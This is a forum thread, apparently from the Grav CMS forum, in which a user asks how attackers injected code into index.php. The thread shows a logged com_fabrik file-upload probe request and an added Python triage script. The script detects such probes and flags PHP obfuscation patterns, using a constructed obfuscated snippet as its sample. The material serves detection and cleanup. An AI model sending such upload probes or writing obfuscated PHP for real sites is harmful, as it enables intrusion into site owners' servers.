Hacking vulnerability


#1

The attackers have embedded code in several of my sites. How did they modify index.php and how to close the gap?


It's very long, more than the limit of symbols. I need help!


#2

Found this code:
193.201.224.210 - - [08/Oct/2018:04:41:58 +0300] "GET /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.0" 404 417 "http://tiriv.ru/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
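An added triage example (not code from the thread or from Grav) covering both posts above: it flags access-log requests aimed at plugin upload handlers, like the com_fabrik/ajax_upload probe in #2, and counts obfuscation indicators of the kind in the injected index.php from #1 (superglobal names spelled as hex escapes such as \x47\x4c\x4f\x42\x41\x4c\x53, which decodes to GLOBALS, and function names built by concatenating single characters indexed out of a scramble string). The log lines and PHP snippet are constructed samples modelled on the thread, and the marker list is an assumption to extend for your own site.

```python
import re

# Apache/nginx "combined" access-log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Query fragments that mark probes for plugin upload handlers rather than page
# views; the thread's log line carries all three. Assumed list, extend as needed.
UPLOAD_PROBE_MARKERS = ("task=plugin.pluginAjax", "plugin=fileupload", "method=ajax_upload")

def scan_access_log(lines):
    """Return (ip, status, target) for each request that looks like an upload probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # truncated or malformed line: skip it rather than abort triage
        target = m.group("target")
        if any(marker in target for marker in UPLOAD_PROBE_MARKERS):
            hits.append((m.group("ip"), int(m.group("status")), target))
    return hits

# Obfuscation indicators: a double-quoted string made only of \xNN escapes, and a
# chain of six or more single-character string offsets glued together with '.'.
HEX_ESCAPED_STRING = re.compile(r'"(?:\\x[0-9a-fA-F]{2}){4,}"')
CHAR_INDEX_CONCAT = re.compile(r'(?:\$\w+\{\d+\}\.){6,}')
SUPERGLOBALS = {"GLOBALS", "_GET", "_POST", "_REQUEST", "_COOKIE", "_SERVER"}

def decode_hex_escapes(literal):
    """Turn the PHP literal "\x47\x4c..." into the plain text it spells."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), literal.strip('"'))

def php_obfuscation_indicators(source):
    """Count indicators in a PHP source string; any non-zero value deserves a manual look."""
    hex_strings = HEX_ESCAPED_STRING.findall(source)
    return {
        "hex_escaped_strings": len(hex_strings),
        "hex_decodes_to_superglobal": sum(decode_hex_escapes(s) in SUPERGLOBALS for s in hex_strings),
        "char_index_concat_chains": len(CHAR_INDEX_CONCAT.findall(source)),
    }

# Constructed samples modelled on the thread (closing quotes added; entities decoded).
SAMPLE_LOG = [
    '193.201.224.210 - - [08/Oct/2018:04:41:58 +0300] "GET /index.php?option=com_fabrik&format=raw'
    '&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.0" 404 417 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [08/Oct/2018:04:42:10 +0300] "GET /blog HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
SAMPLE_PHP = ('<?php $k="abcdefghij";$f=$k{3}.$k{0}.$k{1}.$k{2}.$k{5}.$k{4}.$k{6};'
              '${"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53"}["\\x66"](0);')
```

A 404 on such a probe, as in #2, means the scanner missed; the same request with a 200 against a real upload handler is the one worth correlating with file modification times.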


#3

@starfoxik According to the README on Grav's repo:

Security issues

If you discover a possible security issue related to Grav or one of its plugins, please email the core team at contact@getgrav.org and we’ll address it as soon as possible.


#4

Also read https://learn.getgrav.org/security/users#server-users-and-the-webmaster and https://learn.getgrav.org/security/server-side; edited files are almost always due to a lack of server-side protection and user auth.